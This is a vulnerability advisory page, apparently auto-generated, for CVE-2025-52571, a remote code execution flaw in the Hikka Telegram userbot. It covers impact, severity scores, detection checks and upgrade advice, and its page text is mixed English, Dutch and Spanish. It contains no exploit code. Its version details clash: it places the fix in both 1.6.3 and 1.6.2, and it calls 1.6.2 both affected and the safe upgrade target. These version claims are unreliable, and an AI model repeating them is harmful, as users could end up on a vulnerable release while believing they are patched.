Platform
python
Component
hikariatama/hikka
Opgelost in
1.6.3
CVE-2025-52571 describes a Remote Code Execution (RCE) vulnerability within Hikka, a Telegram userbot. This vulnerability allows an unauthenticated attacker to compromise a victim's Telegram account and gain full access to the server hosting the userbot. The vulnerability impacts versions of Hikka and its forks prior to 1.6.2, and a patch has been released in version 1.6.2.
The impact of this vulnerability is severe. An attacker can leverage it to completely take over a victim's Telegram account, potentially accessing sensitive information, sending messages as the victim, and performing actions on their behalf. Furthermore, the attacker gains full access to the server hosting the Hikka userbot, enabling them to execute arbitrary code, steal data, install malware, or pivot to other systems on the network. This represents a significant security risk, especially if the server hosts other sensitive applications or data.
This vulnerability was publicly disclosed on 2025-06-24. There are currently no known public exploits or active campaigns targeting CVE-2025-52571. The vulnerability's severity (CVSS 9.7) indicates a high probability of exploitation if left unpatched. It is not currently listed on the CISA KEV catalog.
Users of Hikka Telegram userbot, particularly those running versions prior to 1.6.2, are at significant risk. This includes individuals and organizations utilizing Hikka for automated Telegram tasks or bot development. Shared hosting environments where multiple users share the same server are also at increased risk, as a compromise of one user's Hikka instance could potentially lead to broader system compromise.
• python / server:
ps aux | grep hikka• python / server: Check for unusual processes running under the Hikka user account. • python / server: Examine system logs for suspicious commands or network connections originating from the Hikka userbot. • python / server: Monitor for unauthorized Telegram account activity associated with the affected server.
disclosure
Exploit Status
EPSS
0.18% (40% percentiel)
CISA SSVC
CVSS-vector
The primary mitigation for CVE-2025-52571 is to immediately upgrade Hikka to version 1.6.2 or later. Due to the nature of the RCE vulnerability, there are no known workarounds beyond upgrading. Ensure that automatic updates are enabled if possible to prevent future exploitation. After upgrading, verify the integrity of the installation by checking the version number and reviewing system logs for any suspicious activity.
Actualice Hikka a la versión 1.6.2 o superior. Esta versión contiene la corrección de seguridad que previene la ejecución remota de código. La actualización se puede realizar mediante el gestor de paquetes utilizado para instalar Hikka.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2025-52571 is a critical RCE vulnerability affecting Hikka Telegram userbots versions 1.6.2 and earlier, allowing attackers to gain control of accounts and servers.
You are affected if you are using Hikka version 1.6.2 or earlier. Upgrade to 1.6.2 immediately to mitigate the risk.
Upgrade Hikka to version 1.6.2 or later. There are no known workarounds besides upgrading.
Currently, there are no confirmed reports of active exploitation, but the high severity score suggests a potential for future attacks.
Refer to the official Hikka project repository or website for the latest security advisories and release notes.
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.
Upload je requirements.txt-bestand en we vertellen je direct of je getroffen bent.